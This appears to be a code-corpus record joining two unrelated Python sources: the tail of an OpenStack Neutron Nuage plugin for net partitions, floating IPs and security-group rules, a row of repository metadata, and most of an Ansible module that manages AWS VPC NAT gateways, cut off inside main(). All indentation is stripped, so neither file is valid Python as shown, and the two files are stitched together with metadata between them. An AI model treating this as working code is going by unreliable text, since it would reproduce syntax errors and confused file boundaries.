if net_partition:
nuagedb.delete_net_partition(session, net_partition)
net_part = nuagedb.add_net_partition(session,
def_netpart['np_id'],
def_netpart['l3dom_tid'],
def_netpart['l2dom_tid'],
default_net_part)
return self._make_net_partition_dict(net_part)
else:
return self._create_net_partition(session, default_net_part)
def create_net_partition(self, context, net_partition):
ent = net_partition['net_partition']
session = context.session
return self._create_net_partition(session, ent["name"])
def delete_net_partition(self, context, id):
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_entid(context.session,
id)
if ent_rtr_mapping:
msg = (_("One or more router still attached to "
"net_partition %s.") % id)
raise n_exc.BadRequest(resource='net_partition', msg=msg)
net_partition = nuagedb.get_net_partition_by_id(context.session, id)
if not net_partition:
msg = (_("NetPartition with %s does not exist") % id)
raise n_exc.BadRequest(resource='net_partition', msg=msg)
l3dom_tmplt_id = net_partition['l3dom_tmplt_id']
l2dom_tmplt_id = net_partition['l2dom_tmplt_id']
self.nuageclient.delete_net_partition(net_partition['id'],
l3dom_id=l3dom_tmplt_id,
l2dom_id=l2dom_tmplt_id)
with context.session.begin(subtransactions=True):
nuagedb.delete_net_partition(context.session,
net_partition)
def get_net_partition(self, context, id, fields=None):
net_partition = nuagedb.get_net_partition_by_id(context.session,
id)
return self._make_net_partition_dict(net_partition)
def get_net_partitions(self, context, filters=None, fields=None):
net_partitions = nuagedb.get_net_partitions(context.session,
filters=filters,
fields=fields)
return [self._make_net_partition_dict(net_partition, fields)
for net_partition in net_partitions]
def _check_floatingip_update(self, context, port):
filter = {'fixed_port_id': [port['id']]}
local_fip = self.get_floatingips(context,
filters=filter)
if local_fip:
fip = local_fip[0]
self._create_update_floatingip(context,
fip, port['id'])
def _create_update_floatingip(self, context,
neutron_fip, port_id):
rtr_id = neutron_fip['router_id']
net_id = neutron_fip['floating_network_id']
subn = nuagedb.get_ipalloc_for_fip(context.session,
net_id,
neutron_fip['floating_ip_address'])
fip_pool = self.nuageclient.get_nuage_fip_pool_by_id(subn['subnet_id'])
if not fip_pool:
msg = _('sharedresource %s not found on VSD') % subn['subnet_id']
raise n_exc.BadRequest(resource='floatingip',
msg=msg)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(context.session,
rtr_id)
if not ent_rtr_mapping:
msg = _('router %s is not associated with '
'any net-partition') % rtr_id
raise n_exc.BadRequest(resource='floatingip',
msg=msg)
params = {
'router_id': ent_rtr_mapping['nuage_router_id'],
'fip_id': neutron_fip['id'],
'neutron_fip': neutron_fip
}
fip = self.nuageclient.get_nuage_fip_by_id(params)
if not fip:
params = {
'nuage_rtr_id': ent_rtr_mapping['nuage_router_id'],
'nuage_fippool_id': fip_pool['nuage_fip_pool_id'],
'neutron_fip_ip': neutron_fip['floating_ip_address'],
'neutron_fip_id': neutron_fip['id']
}
nuage_fip_id = self.nuageclient.create_nuage_floatingip(params)
else:
nuage_fip_id = fip['nuage_fip_id']
# Update VM if required
params = {
'neutron_port_id': port_id,
'nuage_fip_id': nuage_fip_id,
'nuage_rtr_id': ent_rtr_mapping['nuage_router_id']
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if nuage_port:
if (nuage_port['nuage_domain_id']) != (
ent_rtr_mapping['nuage_router_id']):
msg = _('Floating IP can not be associated to VM in '
'different router context')
raise nuage_exc.OperationNotSupported(msg=msg)
params = {
'nuage_vport_id': nuage_port['nuage_vport_id'],
'nuage_fip_id': nuage_fip_id
}
self.nuageclient.update_nuage_vm_vport(params)
def create_floatingip(self, context, floatingip):
fip = floatingip['floatingip']
with context.session.begin(subtransactions=True):
neutron_fip = super(NuagePlugin, self).create_floatingip(
context, floatingip)
if not neutron_fip['router_id']:
return neutron_fip
try:
self._create_update_floatingip(context, neutron_fip,
fip['port_id'])
except (nuage_exc.OperationNotSupported, n_exc.BadRequest):
with excutils.save_and_reraise_exception():
super(NuagePlugin, self).delete_floatingip(
context, neutron_fip['id'])
return neutron_fip
def disassociate_floatingips(self, context, port_id, do_notify=True):
router_ids = super(NuagePlugin, self).disassociate_floatingips(
context, port_id, do_notify=do_notify)
params = {
'neutron_port_id': port_id,
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if nuage_port:
params = {
'nuage_vport_id': nuage_port['nuage_vport_id'],
'nuage_fip_id': None
}
self.nuageclient.update_nuage_vm_vport(params)
return router_ids
def update_floatingip(self, context, id, floatingip):
fip = floatingip['floatingip']
orig_fip = self._get_floatingip(context, id)
port_id = orig_fip['fixed_port_id']
router_ids = []
with context.session.begin(subtransactions=True):
neutron_fip = super(NuagePlugin, self).update_floatingip(
context, id, floatingip)
if fip['port_id'] is not None:
if not neutron_fip['router_id']:
ret_msg = 'floating-ip is not associated yet'
raise n_exc.BadRequest(resource='floatingip',
msg=ret_msg)
try:
self._create_update_floatingip(context,
neutron_fip,
fip['port_id'])
except nuage_exc.OperationNotSupported:
with excutils.save_and_reraise_exception():
router_ids = super(
NuagePlugin, self).disassociate_floatingips(
context, fip['port_id'], do_notify=False)
except n_exc.BadRequest:
with excutils.save_and_reraise_exception():
super(NuagePlugin, self).delete_floatingip(context,
id)
else:
params = {
'neutron_port_id': port_id,
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if nuage_port:
params = {
'nuage_vport_id': nuage_port['nuage_vport_id'],
'nuage_fip_id': None
}
self.nuageclient.update_nuage_vm_vport(params)
# now that we've left db transaction, we are safe to notify
self.notify_routers_updated(context, router_ids)
return neutron_fip
def delete_floatingip(self, context, fip_id):
fip = self._get_floatingip(context, fip_id)
port_id = fip['fixed_port_id']
with context.session.begin(subtransactions=True):
if port_id:
params = {
'neutron_port_id': port_id,
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if (nuage_port and
nuage_port['nuage_vport_id'] is not None):
params = {
'nuage_vport_id': nuage_port['nuage_vport_id'],
'nuage_fip_id': None
}
self.nuageclient.update_nuage_vm_vport(params)
LOG.debug("Floating-ip %(fip)s is disassociated from "
"vport %(vport)s",
{'fip': fip_id,
'vport': nuage_port['nuage_vport_id']})
router_id = fip['router_id']
else:
router_id = fip['last_known_router_id']
if router_id:
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(
context.session,
router_id)
if not ent_rtr_mapping:
msg = _('router %s is not associated with '
'any net-partition') % router_id
raise n_exc.BadRequest(resource='floatingip',
msg=msg)
params = {
'router_id': ent_rtr_mapping['nuage_router_id'],
'fip_id': fip_id
}
fip = self.nuageclient.get_nuage_fip_by_id(params)
if fip:
self.nuageclient.delete_nuage_floatingip(
fip['nuage_fip_id'])
LOG.debug('Floating-ip %s deleted from VSD', fip_id)
super(NuagePlugin, self).delete_floatingip(context, fip_id)
def delete_security_group(self, context, id):
filters = {'security_group_id': [id]}
ports = self._get_port_security_group_bindings(context,
filters)
if ports:
raise ext_sg.SecurityGroupInUse(id=id)
sg_rules = self.get_security_group_rules(context,
{'security_group_id': [id]})
if sg_rules:
self.nuageclient.delete_nuage_sgrule(sg_rules)
self.nuageclient.delete_nuage_secgroup(id)
super(NuagePlugin, self).delete_security_group(context, id)
def create_security_group_rule(self, context, security_group_rule):
sg_rule = security_group_rule['security_group_rule']
self.nuageclient.validate_nuage_sg_rule_definition(sg_rule)
sg_id = sg_rule['security_group_id']
local_sg_rule = super(NuagePlugin,
self).create_security_group_rule(
context, security_group_rule)
try:
nuage_vptag = self.nuageclient.get_sg_vptag_mapping(sg_id)
if nuage_vptag:
sg_params = {
'sg_id': sg_id,
'neutron_sg_rule': local_sg_rule,
'vptag': nuage_vptag
}
self.nuageclient.create_nuage_sgrule(sg_params)
except Exception:
with excutils.save_and_reraise_exception():
super(NuagePlugin,
self).delete_security_group_rule(context,
local_sg_rule['id'])
return local_sg_rule
def delete_security_group_rule(self, context, id):
local_sg_rule = self.get_security_group_rule(context, id)
super(NuagePlugin, self).delete_security_group_rule(context, id)
self.nuageclient.delete_nuage_sgrule([local_sg_rule])
| 47.247741
| 79
| 0.544936
|
09fc70de33560091e2f3692054d80d2dddda1376
| 32,890
|
py
|
Python
|
Ansible-AWS-Provisioning/collections/ansible_collections/community/aws/plugins/modules/ec2_vpc_nat_gateway.py
|
ginigangadharan/ansible-real-life
|
897c2fc0d05babbb540768b336b6ad399dad5bfa
|
[
"MIT"
] | 22
|
2021-07-16T08:11:22.000Z
|
2022-03-31T07:15:34.000Z
|
Ansible-AWS-Provisioning/collections/ansible_collections/community/aws/plugins/modules/ec2_vpc_nat_gateway.py
|
premsagar0228/ansible-real-life
|
1a51193b833ab6ad320100472333b9ffb0da39d4
|
[
"MIT"
] | null | null | null |
Ansible-AWS-Provisioning/collections/ansible_collections/community/aws/plugins/modules/ec2_vpc_nat_gateway.py
|
premsagar0228/ansible-real-life
|
1a51193b833ab6ad320100472333b9ffb0da39d4
|
[
"MIT"
] | 39
|
2021-07-05T02:31:42.000Z
|
2022-03-31T02:46:03.000Z
|
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_vpc_nat_gateway
short_description: Manage AWS VPC NAT Gateways.
description:
- Ensure the state of AWS VPC NAT Gateways based on their id, allocation and subnet ids.
requirements: [boto3, botocore]
options:
state:
description:
- Ensure NAT Gateway is present or absent.
default: "present"
choices: ["present", "absent"]
type: str
nat_gateway_id:
description:
- The id AWS dynamically allocates to the NAT Gateway on creation.
This is required when the absent option is present.
type: str
subnet_id:
description:
- The id of the subnet to create the NAT Gateway in. This is required
with the present option.
type: str
allocation_id:
description:
- The id of the elastic IP allocation. If this is not passed and the
eip_address is not passed. An EIP is generated for this NAT Gateway.
type: str
eip_address:
description:
- The elastic IP address of the EIP you want attached to this NAT Gateway.
If this is not passed and the allocation_id is not passed,
an EIP is generated for this NAT Gateway.
type: str
if_exist_do_not_create:
description:
- if a NAT Gateway exists already in the subnet_id, then do not create a new one.
required: false
default: false
type: bool
release_eip:
description:
- Deallocate the EIP from the VPC.
- Option is only valid with the absent state.
- You should use this with the wait option. Since you can not release an address while a delete operation is happening.
default: false
type: bool
wait:
description:
- Wait for operation to complete before returning.
default: false
type: bool
wait_timeout:
description:
- How many seconds to wait for an operation to complete before timing out.
default: 320
type: int
client_token:
description:
- Optional unique token to be used during create to ensure idempotency.
When specifying this option, ensure you specify the eip_address parameter
as well otherwise any subsequent runs will fail.
type: str
author:
- Allen Sanabria (@linuxdynasty)
- Jon Hadfield (@jonhadfield)
- Karen Cheng (@Etherdaemon)
extends_documentation_fragment:
- amazon.aws.aws
- amazon.aws.ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- name: Create new nat gateway with client token.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
eip_address: 52.1.1.1
region: ap-southeast-2
client_token: abcd-12345678
register: new_nat_gateway
- name: Create new nat gateway using an allocation-id.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
allocation_id: eipalloc-12345678
region: ap-southeast-2
register: new_nat_gateway
- name: Create new nat gateway, using an EIP address and wait for available status.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
eip_address: 52.1.1.1
wait: true
region: ap-southeast-2
register: new_nat_gateway
- name: Create new nat gateway and allocate new EIP.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
wait: true
region: ap-southeast-2
register: new_nat_gateway
- name: Create new nat gateway and allocate new EIP if a nat gateway does not yet exist in the subnet.
ec2_vpc_nat_gateway:
state: present
subnet_id: subnet-12345678
wait: true
region: ap-southeast-2
if_exist_do_not_create: true
register: new_nat_gateway
- name: Delete nat gateway using discovered nat gateways from facts module.
ec2_vpc_nat_gateway:
state: absent
region: ap-southeast-2
wait: true
nat_gateway_id: "{{ item.NatGatewayId }}"
release_eip: true
register: delete_nat_gateway_result
loop: "{{ gateways_to_remove.result }}"
- name: Delete nat gateway and wait for deleted status.
ec2_vpc_nat_gateway:
state: absent
nat_gateway_id: nat-12345678
wait: true
wait_timeout: 500
region: ap-southeast-2
- name: Delete nat gateway and release EIP.
ec2_vpc_nat_gateway:
state: absent
nat_gateway_id: nat-12345678
release_eip: true
wait: yes
wait_timeout: 300
region: ap-southeast-2
'''
RETURN = '''
create_time:
description: The ISO 8601 date time format in UTC.
returned: In all cases.
type: str
sample: "2016-03-05T05:19:20.282000+00:00'"
nat_gateway_id:
description: id of the VPC NAT Gateway
returned: In all cases.
type: str
sample: "nat-0d1e3a878585988f8"
subnet_id:
description: id of the Subnet
returned: In all cases.
type: str
sample: "subnet-12345"
state:
description: The current state of the NAT Gateway.
returned: In all cases.
type: str
sample: "available"
vpc_id:
description: id of the VPC.
returned: In all cases.
type: str
sample: "vpc-12345"
nat_gateway_addresses:
description: List of dictionaries containing the public_ip, network_interface_id, private_ip, and allocation_id.
returned: In all cases.
type: str
sample: [
{
'public_ip': '52.52.52.52',
'network_interface_id': 'eni-12345',
'private_ip': '10.0.0.100',
'allocation_id': 'eipalloc-12345'
}
]
'''
import datetime
import random
import time
try:
import botocore
except ImportError:
pass # caught by imported HAS_BOTO3
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.amazon.aws.plugins.module_utils.ec2 import (ec2_argument_spec,
get_aws_connection_info,
boto3_conn,
camel_dict_to_snake_dict,
HAS_BOTO3,
)
DRY_RUN_GATEWAYS = [
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-123456789",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-1234567"
}
],
"state": "available",
"create_time": "2016-03-05T05:19:20.282000+00:00",
"vpc_id": "vpc-12345678"
}
]
DRY_RUN_ALLOCATION_UNCONVERTED = {
'Addresses': [
{
'PublicIp': '55.55.55.55',
'Domain': 'vpc',
'AllocationId': 'eipalloc-1234567'
}
]
}
DRY_RUN_MSGS = 'DryRun Mode:'
def get_nat_gateways(client, subnet_id=None, nat_gateway_id=None,
states=None, check_mode=False):
"""Retrieve a list of NAT Gateways
Args:
client (botocore.client.EC2): Boto3 client
Kwargs:
subnet_id (str): The subnet_id the nat resides in.
nat_gateway_id (str): The Amazon nat id.
states (list): States available (pending, failed, available, deleting, and deleted)
default=None
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-12345678'
>>> get_nat_gateways(client, subnet_id)
[
true,
"",
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-123456789",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-1234567"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-12345678"
}
Returns:
Tuple (bool, str, list)
"""
params = dict()
err_msg = ""
gateways_retrieved = False
existing_gateways = list()
if not states:
states = ['available', 'pending']
if nat_gateway_id:
params['NatGatewayIds'] = [nat_gateway_id]
else:
params['Filter'] = [
{
'Name': 'subnet-id',
'Values': [subnet_id]
},
{
'Name': 'state',
'Values': states
}
]
try:
if not check_mode:
gateways = client.describe_nat_gateways(**params)['NatGateways']
if gateways:
for gw in gateways:
existing_gateways.append(camel_dict_to_snake_dict(gw))
gateways_retrieved = True
else:
gateways_retrieved = True
if nat_gateway_id:
if DRY_RUN_GATEWAYS[0]['nat_gateway_id'] == nat_gateway_id:
existing_gateways = DRY_RUN_GATEWAYS
elif subnet_id:
if DRY_RUN_GATEWAYS[0]['subnet_id'] == subnet_id:
existing_gateways = DRY_RUN_GATEWAYS
err_msg = '{0} Retrieving gateways'.format(DRY_RUN_MSGS)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
return gateways_retrieved, err_msg, existing_gateways
def wait_for_status(client, wait_timeout, nat_gateway_id, status,
check_mode=False):
"""Wait for the NAT Gateway to reach a status
Args:
client (botocore.client.EC2): Boto3 client
wait_timeout (int): Number of seconds to wait, until this timeout is reached.
nat_gateway_id (str): The Amazon nat id.
status (str): The status to wait for.
examples. status=available, status=deleted
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-12345678'
>>> allocation_id = 'eipalloc-12345678'
>>> wait_for_status(client, subnet_id, allocation_id)
[
true,
"",
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-1234567",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-12345678"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-12345677"
}
]
Returns:
Tuple (bool, str, dict)
"""
polling_increment_secs = 5
wait_timeout = time.time() + wait_timeout
status_achieved = False
nat_gateway = dict()
states = ['pending', 'failed', 'available', 'deleting', 'deleted']
err_msg = ""
while wait_timeout > time.time():
try:
gws_retrieved, err_msg, nat_gateways = (
get_nat_gateways(
client, nat_gateway_id=nat_gateway_id,
states=states, check_mode=check_mode
)
)
if gws_retrieved and nat_gateways:
nat_gateway = nat_gateways[0]
if check_mode:
nat_gateway['state'] = status
if nat_gateway.get('state') == status:
status_achieved = True
break
elif nat_gateway.get('state') == 'failed':
err_msg = nat_gateway.get('failure_message')
break
elif nat_gateway.get('state') == 'pending':
if 'failure_message' in nat_gateway:
err_msg = nat_gateway.get('failure_message')
status_achieved = False
break
else:
time.sleep(polling_increment_secs)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
if not status_achieved:
err_msg = "Wait time out reached, while waiting for results"
return status_achieved, err_msg, nat_gateway
def gateway_in_subnet_exists(client, subnet_id, allocation_id=None,
check_mode=False):
"""Retrieve all NAT Gateways for a subnet.
Args:
subnet_id (str): The subnet_id the nat resides in.
Kwargs:
allocation_id (str): The EIP Amazon identifier.
default = None
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-1234567'
>>> allocation_id = 'eipalloc-1234567'
>>> gateway_in_subnet_exists(client, subnet_id, allocation_id)
(
[
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-123456789",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-1234567"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-1234567"
}
],
False
)
Returns:
Tuple (list, bool)
"""
allocation_id_exists = False
gateways = []
states = ['available', 'pending']
gws_retrieved, err_msg, gws = (
get_nat_gateways(
client, subnet_id, states=states, check_mode=check_mode
)
)
if not gws_retrieved:
return gateways, allocation_id_exists
for gw in gws:
for address in gw['nat_gateway_addresses']:
if allocation_id:
if address.get('allocation_id') == allocation_id:
allocation_id_exists = True
gateways.append(gw)
else:
gateways.append(gw)
return gateways, allocation_id_exists
def get_eip_allocation_id_by_address(client, eip_address, check_mode=False):
"""Release an EIP from your EIP Pool
Args:
client (botocore.client.EC2): Boto3 client
eip_address (str): The Elastic IP Address of the EIP.
Kwargs:
check_mode (bool): if set to true, do not run anything and
falsify the results.
Basic Usage:
>>> client = boto3.client('ec2')
>>> eip_address = '52.87.29.36'
>>> get_eip_allocation_id_by_address(client, eip_address)
'eipalloc-36014da3'
Returns:
Tuple (str, str)
"""
params = {
'PublicIps': [eip_address],
}
allocation_id = None
err_msg = ""
try:
if not check_mode:
allocations = client.describe_addresses(**params)['Addresses']
if len(allocations) == 1:
allocation = allocations[0]
else:
allocation = None
else:
dry_run_eip = (
DRY_RUN_ALLOCATION_UNCONVERTED['Addresses'][0]['PublicIp']
)
if dry_run_eip == eip_address:
allocation = DRY_RUN_ALLOCATION_UNCONVERTED['Addresses'][0]
else:
allocation = None
if allocation:
if allocation.get('Domain') != 'vpc':
err_msg = (
"EIP {0} is a non-VPC EIP, please allocate a VPC scoped EIP"
.format(eip_address)
)
else:
allocation_id = allocation.get('AllocationId')
else:
err_msg = (
"EIP {0} does not exist".format(eip_address)
)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
return allocation_id, err_msg
def allocate_eip_address(client, check_mode=False):
"""Release an EIP from your EIP Pool
Args:
client (botocore.client.EC2): Boto3 client
Kwargs:
check_mode (bool): if set to true, do not run anything and
falsify the results.
Basic Usage:
>>> client = boto3.client('ec2')
>>> allocate_eip_address(client)
True
Returns:
Tuple (bool, str)
"""
ip_allocated = False
new_eip = None
err_msg = ''
params = {
'Domain': 'vpc',
}
try:
if check_mode:
ip_allocated = True
random_numbers = (
''.join(str(x) for x in random.sample(range(0, 9), 7))
)
new_eip = 'eipalloc-{0}'.format(random_numbers)
else:
new_eip = client.allocate_address(**params)['AllocationId']
ip_allocated = True
err_msg = 'eipalloc id {0} created'.format(new_eip)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
return ip_allocated, err_msg, new_eip
def release_address(client, allocation_id, check_mode=False):
"""Release an EIP from your EIP Pool
Args:
client (botocore.client.EC2): Boto3 client
allocation_id (str): The eip Amazon identifier.
Kwargs:
check_mode (bool): if set to true, do not run anything and
falsify the results.
Basic Usage:
>>> client = boto3.client('ec2')
>>> allocation_id = "eipalloc-123456"
>>> release_address(client, allocation_id)
True
Returns:
Boolean, string
"""
err_msg = ''
if check_mode:
return True, ''
ip_released = False
try:
client.describe_addresses(AllocationIds=[allocation_id])
except botocore.exceptions.ClientError as e:
# IP address likely already released
# Happens with gateway in 'deleted' state that
# still lists associations
return True, str(e)
try:
client.release_address(AllocationId=allocation_id)
ip_released = True
except botocore.exceptions.ClientError as e:
err_msg = str(e)
return ip_released, err_msg
def create(client, subnet_id, allocation_id, client_token=None,
wait=False, wait_timeout=0, if_exist_do_not_create=False,
check_mode=False):
"""Create an Amazon NAT Gateway.
Args:
client (botocore.client.EC2): Boto3 client
subnet_id (str): The subnet_id the nat resides in.
allocation_id (str): The eip Amazon identifier.
Kwargs:
if_exist_do_not_create (bool): if a nat gateway already exists in this
subnet, than do not create another one.
default = False
wait (bool): Wait for the nat to be in the deleted state before returning.
default = False
wait_timeout (int): Number of seconds to wait, until this timeout is reached.
default = 0
client_token (str):
default = None
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-1234567'
>>> allocation_id = 'eipalloc-1234567'
>>> create(client, subnet_id, allocation_id, if_exist_do_not_create=True, wait=True, wait_timeout=500)
[
true,
"",
{
"nat_gateway_id": "nat-123456789",
"subnet_id": "subnet-1234567",
"nat_gateway_addresses": [
{
"public_ip": "55.55.55.55",
"network_interface_id": "eni-1234567",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-1234567"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-1234567"
}
]
Returns:
Tuple (bool, str, list)
"""
params = {
'SubnetId': subnet_id,
'AllocationId': allocation_id
}
request_time = datetime.datetime.utcnow()
changed = False
success = False
token_provided = False
err_msg = ""
if client_token:
token_provided = True
params['ClientToken'] = client_token
try:
if not check_mode:
result = camel_dict_to_snake_dict(client.create_nat_gateway(**params)["NatGateway"])
else:
result = DRY_RUN_GATEWAYS[0]
result['create_time'] = datetime.datetime.utcnow()
result['nat_gateway_addresses'][0]['allocation_id'] = allocation_id
result['subnet_id'] = subnet_id
success = True
changed = True
create_time = result['create_time'].replace(tzinfo=None)
if token_provided and (request_time > create_time):
changed = False
elif wait:
success, err_msg, result = (
wait_for_status(
client, wait_timeout, result['nat_gateway_id'], 'available',
check_mode=check_mode
)
)
if success:
err_msg = (
'NAT gateway {0} created'.format(result['nat_gateway_id'])
)
except botocore.exceptions.ClientError as e:
if "IdempotentParameterMismatch" in e.message:
err_msg = (
'NAT Gateway does not support update and token has already been provided: ' + str(e)
)
else:
err_msg = str(e)
success = False
changed = False
result = None
return success, changed, err_msg, result
def pre_create(client, subnet_id, allocation_id=None, eip_address=None,
if_exist_do_not_create=False, wait=False, wait_timeout=0,
client_token=None, check_mode=False):
"""Create an Amazon NAT Gateway.
Args:
client (botocore.client.EC2): Boto3 client
subnet_id (str): The subnet_id the nat resides in.
Kwargs:
allocation_id (str): The EIP Amazon identifier.
default = None
eip_address (str): The Elastic IP Address of the EIP.
default = None
if_exist_do_not_create (bool): if a nat gateway already exists in this
subnet, than do not create another one.
default = False
wait (bool): Wait for the nat to be in the deleted state before returning.
default = False
wait_timeout (int): Number of seconds to wait, until this timeout is reached.
default = 0
client_token (str):
default = None
Basic Usage:
>>> client = boto3.client('ec2')
>>> subnet_id = 'subnet-w4t12897'
>>> allocation_id = 'eipalloc-36014da3'
>>> pre_create(client, subnet_id, allocation_id, if_exist_do_not_create=True, wait=True, wait_timeout=500)
[
true,
"",
{
"nat_gateway_id": "nat-03835afb6e31df79b",
"subnet_id": "subnet-w4t12897",
"nat_gateway_addresses": [
{
"public_ip": "52.87.29.36",
"network_interface_id": "eni-5579742d",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-36014da3"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-w68571b5"
}
]
Returns:
Tuple (bool, bool, str, list)
"""
success = False
changed = False
err_msg = ""
results = list()
if not allocation_id and not eip_address:
existing_gateways, allocation_id_exists = (
gateway_in_subnet_exists(client, subnet_id, check_mode=check_mode)
)
if len(existing_gateways) > 0 and if_exist_do_not_create:
success = True
changed = False
results = existing_gateways[0]
err_msg = (
'NAT Gateway {0} already exists in subnet_id {1}'
.format(
existing_gateways[0]['nat_gateway_id'], subnet_id
)
)
return success, changed, err_msg, results
else:
success, err_msg, allocation_id = (
allocate_eip_address(client, check_mode=check_mode)
)
if not success:
return success, 'False', err_msg, dict()
elif eip_address or allocation_id:
if eip_address and not allocation_id:
allocation_id, err_msg = (
get_eip_allocation_id_by_address(
client, eip_address, check_mode=check_mode
)
)
if not allocation_id:
success = False
changed = False
return success, changed, err_msg, dict()
existing_gateways, allocation_id_exists = (
gateway_in_subnet_exists(
client, subnet_id, allocation_id, check_mode=check_mode
)
)
if len(existing_gateways) > 0 and (allocation_id_exists or if_exist_do_not_create):
success = True
changed = False
results = existing_gateways[0]
err_msg = (
'NAT Gateway {0} already exists in subnet_id {1}'
.format(
existing_gateways[0]['nat_gateway_id'], subnet_id
)
)
return success, changed, err_msg, results
success, changed, err_msg, results = create(
client, subnet_id, allocation_id, client_token,
wait, wait_timeout, if_exist_do_not_create, check_mode=check_mode
)
return success, changed, err_msg, results
def remove(client, nat_gateway_id, wait=False, wait_timeout=0,
release_eip=False, check_mode=False):
"""Delete an Amazon NAT Gateway.
Args:
client (botocore.client.EC2): Boto3 client
nat_gateway_id (str): The Amazon nat id.
Kwargs:
wait (bool): Wait for the nat to be in the deleted state before returning.
wait_timeout (int): Number of seconds to wait, until this timeout is reached.
release_eip (bool): Once the nat has been deleted, you can deallocate the eip from the vpc.
Basic Usage:
>>> client = boto3.client('ec2')
>>> nat_gw_id = 'nat-03835afb6e31df79b'
>>> remove(client, nat_gw_id, wait=True, wait_timeout=500, release_eip=True)
[
true,
"",
{
"nat_gateway_id": "nat-03835afb6e31df79b",
"subnet_id": "subnet-w4t12897",
"nat_gateway_addresses": [
{
"public_ip": "52.87.29.36",
"network_interface_id": "eni-5579742d",
"private_ip": "10.0.0.102",
"allocation_id": "eipalloc-36014da3"
}
],
"state": "deleted",
"create_time": "2016-03-05T00:33:21.209000+00:00",
"delete_time": "2016-03-05T00:36:37.329000+00:00",
"vpc_id": "vpc-w68571b5"
}
]
Returns:
Tuple (bool, str, list)
"""
params = {
'NatGatewayId': nat_gateway_id
}
success = False
changed = False
err_msg = ""
results = list()
states = ['pending', 'available']
try:
exist, err_msg, gw = (
get_nat_gateways(
client, nat_gateway_id=nat_gateway_id,
states=states, check_mode=check_mode
)
)
if exist and len(gw) == 1:
results = gw[0]
if not check_mode:
client.delete_nat_gateway(**params)
allocation_id = (
results['nat_gateway_addresses'][0]['allocation_id']
)
changed = True
success = True
err_msg = (
'NAT gateway {0} is in a deleting state. Delete was successful'
.format(nat_gateway_id)
)
if wait:
status_achieved, err_msg, results = (
wait_for_status(
client, wait_timeout, nat_gateway_id, 'deleted',
check_mode=check_mode
)
)
if status_achieved:
err_msg = (
'NAT gateway {0} was deleted successfully'
.format(nat_gateway_id)
)
except botocore.exceptions.ClientError as e:
err_msg = str(e)
if release_eip:
eip_released, eip_err = (
release_address(client, allocation_id, check_mode)
)
if not eip_released:
err_msg = (
"{0}: Failed to release EIP {1}: {2}"
.format(err_msg, allocation_id, eip_err)
)
success = False
return success, changed, err_msg, results
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
subnet_id=dict(type='str'),
eip_address=dict(type='str'),
allocation_id=dict(type='str'),
if_exist_do_not_create=dict(type='bool', default=False),
state=dict(default='present', choices=['present', 'absent']),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=320, required=False),
release_eip=dict(type='bool', default=False),
nat_gateway_id=dict(type='str'),
client_token=dict(type='str'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[
['allocation_id', 'eip_address']
],
required_if=[['state', 'absent', ['nat_gateway_id']],
['state', 'present', ['subnet_id']]]
)
# Validate Requirements
if not HAS_BOTO3:
module.fail_json(msg='botocore/boto3 is required.')
state = module.params.get('state').lower()
